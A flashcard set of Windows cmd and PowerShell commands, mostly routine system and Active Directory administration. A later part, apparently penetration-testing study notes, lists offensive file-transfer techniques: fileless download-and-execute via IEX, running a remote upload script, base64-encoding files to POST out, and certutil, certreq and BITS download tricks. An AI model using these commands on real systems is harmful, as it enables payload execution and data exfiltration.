Useful powershell commands (and cmd) Flashcards
must learn these!
How to convert from base64 powershell?
Show system information
systeminfo
List all running processes
tasklist
Kill a process by name
taskkill /IM [process_name] /F
Kill a process by PID
taskkill /PID [pid] /F
Clear the command prompt screen
cls
List files in a directory
dir
Change directory
cd [directory]
Create a new directory
mkdir [directory]
Remove a directory
rmdir /S /Q [directory]
Copy a file
copy [source] [destination]
Move or rename a file
move [source] [destination]
Delete a file (cmd)
del [file_name]
Show IP configuration
ipconfig /all
Release IP address
ipconfig /release
Renew IP address
ipconfig /renew
Flush DNS cache
ipconfig /flushdns
Display active network connections
netstat -an
Display listening ports
netstat -an | find “LISTEN”
Ping a host
ping [hostname_or_ip]
Trace route to a host
tracert [hostname_or_ip]
Check open ports on a remote host (cmd)
telnet [hostname_or_ip] [port]
Shutdown the computer
shutdown /s /t 0
Restart the computer
shutdown /r /t 0
Log off current user
shutdown /l
Check disk usage
chkdsk
Check and repair disk errors
chkdsk /f
Show available disk space
wmic logicaldisk get size,freespace,caption
List installed programs
wmic product get name
Find specific installed program
wmic product where “name like ‘%[program_name]%’” get name
Create a new user
net user [username] [password] /add
Delete a user
net user [username] /delete
Add user to a group
net localgroup [groupname] [username] /add
Remove user from a group
net localgroup [groupname]
[username] /delete
List all users
net user
List all groups
net localgroup
Enable remote desktop
reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable remote desktop
reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f
Start a service (cmd)
net start [service_name]
Stop a service
net stop [service_name]
List all services
sc query
Check service status (cmd)
sc query [service_name]
Enable a service
sc config [service_name] start= auto
Disable a service (cmd)
sc config [service_name] start= disabled
List all environment variables
set
Set an environment variable
setx [variable_name] [value] /M
Delete an environment variable
setx [variable_name] “” /M
Get current date (cmd)
echo %DATE%
Get current time
echo %TIME%
Find a string in a file
findstr “pattern” [file_name]
Create a compressed zip file (powershell)
Compress-Archive -Path [file_name] -DestinationPath [output.zip]
Extract a zip file
Expand-Archive -Path [input.zip] -DestinationPath [directory]
Get running processes (PowerShell)
Get-Process
Kill a process (PowerShell)
Stop-Process -Name [process_name] -Force
Get system uptime (PowerShell)
(get-date) - (gcim Win32_OperatingSystem).LastBootUpTime
Get system information (PowerShell)
Get-ComputerInfo
List installed software (PowerShell)
Get-WmiObject -Query “SELECT * FROM Win32_Product”
Check Windows version (PowerShell)
“[System.Environment]::OSVersion”
Restart a service (PowerShell)
Restart-Service -Name [service_name]
List network adapters (PowerShell)
Get-NetAdapter
Disable network adapter (PowerShell)
Disable-NetAdapter -Name “[adapter_name]”
Enable network adapter (PowerShell)
Enable-NetAdapter -Name “[adapter_name]”
Get IP configuration (PowerShell)
Get-NetIPConfiguration
Get firewall rules (PowerShell)
Get-NetFirewallRule
Enable firewall rule (PowerShell)
Enable-NetFirewallRule -DisplayName “[rule_name]”
Disable firewall rule (PowerShell)
Disable-NetFirewallRule -DisplayName “[rule_name]”
Check open ports (PowerShell)
Test-NetConnection -ComputerName [hostname_or_ip] -Port [port]
Ping a host (PowerShell)
Test-Connection -ComputerName <hostname_or_ip
List active TCP connections (PowerShell)
Get-NetTCPConnection
Restart computer (PowerShell)
Restart-Computer -Force
Shutdown computer (PowerShell)
Stop-Computer -Force
Get available storage (PowerShell)
Get-PSDrive -PSProvider FileSystem
Check disk health (PowerShell)
Get-PhysicalDisk
Format a disk (PowerShell)
Format-Volume -DriveLetter [drive_letter] -FileSystem NTFS -NewFileSystemLabel “NewLabel”
List running services (PowerShell)
Get-Service
Start a service (PowerShell)
Start-Service -Name [service_name]
Stop a service (PowerShell)
Stop-Service -Name [service_name]
Set execution policy (PowerShell)
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Run a script as administrator (PowerShell)
Start-Process PowerShell -Verb RunAs -ArgumentList “-File [script.ps1]”
List scheduled tasks (PowerShell)
Get-ScheduledTask
Get system logs (PowerShell)
Get-EventLog -LogName System -Newest 10
Export event logs to a file (PowerShell)
wevtutil epl System C:\Logs\system.evtx /ow:true
Get information about an AD Domain
Get-ADDomain
See what groups you’re in
whoami /groups
How to download http powershell? 1
(New-Object Net.WebClient).DownloadFile(‘[Target File URL]’,’[Output File Name]’)
Fileless download execution powershell? 1
(New-Object Net.WebClient).DownloadString(‘[url]’) | IEX
How to download http powershell? 2
Invoke-WebRequest [url] -OutFile [out_file]
Fileless download powershell? 2
Invoke-WebRequest [url] -UseBasicParsing | IEX
https download untrusted certificate bypass powershell?
http upload powershell? 1
IEX(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1’) && Invoke-FileUpload -Uri [url] -File [file]
http upload powershell? 2
b64 = [System.convert]::ToBase64String((Get-Content -Path ‘[file]’ -Encoding Byte)) && Invoke-WebRequest -Uri [url] -Method POST -Body $b64
How to list the contents of a share? 1
dir \\[ip]\share
How to copy a file from a share?
copy <file> \\[host]\[file]</file>
Map smb share to drive?
net use n: \[ip][share]
Map smb share to drive with auth?
net use n: \[ip][share] /user:[username] [password]
List total number of files in a share after mapped?
dir [drive]: /a-d /s /b | find /c “:"
How to search for file names with dir?
dir n:*[name]* /s /b
How to map smb share to drive powershell?
New-PSDrive -Name “N” -Root “\[hostname][share]” -PSProvider “FileSystem”
How to create PSCredential object?
$secpassword = ConvertTo-SecureString [pass] -AsPlainText -Force &&
$cred = New-Object System.Management.Automation.PSCredential [user] $secpassword
How to count the number of files in a share powershell?
cd [drive]: && (Get-ChildItem -File -Recurse | Measure-Object).Count
How to start a powershell remote session?
$Session = New-PSSession -ComputerName [hostname]
How to upload a file to a remote powershell session?
Copy-Item -Path [file] -ToSession $Session -Destination [out_file]
How to download a file from a remote powershell session?
Copy-Item -Path [file] -Destination [file] -FromSession $Session
How to access an rdp mounted filesystem?
dir \tsclient\
How to encrypt a file powershell?
Invoke-AESEncryption -Mode Encrypt -Key [encryption_key] -Path [outfile]
How to POST a file with certreq.exe?
certreq.exe -Post -config [url]
How to download http with BITSadmin powershell?
Import-Module bitstransfer; Start-BitsTransfer -Source [url] -Destination [path]
How to download with certutil http?
certutil.exe -verifyctl -split -f http://<remote>:<remote>/<remote></remote></remote></remote>
How to download http with GfxDownloadWrapper.exe?
GfxDownloadWrapper.exe [url] [path]
How to open diskmanagement?
win + r “diskmgmt.msc”
How to connect to a remote MSSQL database via commandline?
sqsh -S [ip] -U [user] -P [pass]
How to connect to mysql database via commandline?
mysql.exe -u [username] -p[password]-h [ip]
How to find an AD user by name powershell?
Get-ADUser -Filter “Name -eq [name]” -Properties *
How to remove an AD user powershell?
Remove-ADUser -Identity [SamAccountName]
How to add an AD User powershell?
Add-ADUser (-FullName …, -SamAccountName…, -DisplayName…, -Password.., ect.)
How to unlock an AD account powershell?
Unlock-ADAccount [SamAccountName]
How to reset the password for an AD account powershell?
Set-ADAccountPassword -Identity [SamAccountName] -Reset -NewPassword (ConvertTo-SecureString -AsPlainText [password] -Force)
How to set an AD Account to create a new password at next logon powershell?
Set-ADUser -Identity [SamAccountName] -ChangePasswordAtLogon $true
How to copy a GPO powershell?
Copy-GPO -SourceName [GPO-to-copy] -TargetName [copied GPO name]
How to link a GPO to an OU powershell?
New-GPLink -Name [GPO name] -Target [OU name] -LinkEnabled Yes
What command is used to domain-join a local computer powershell?
Add-Computer -DomainName [domain name] -Credential INLANEFREIGHT[admin uname] -Restart
What command is used to domain join a remote computer powershell?
Add-Computer -ComputerName [hostname] -LocalCredential [local admin uname] -DomainName [domain name] -Credential [domain admin uname] -Restart
How to find the OU membership of a computer powershell?
Get-ADComputer -Identity [hostname] -Properties * | select CN,CanonicalName,IPv4Address
How to check if a computer is domain joined?
systeminfo | findstr /B “Domain”
(or check in settings)
Which command output details the required and available security properties of a computer?
systeminfo
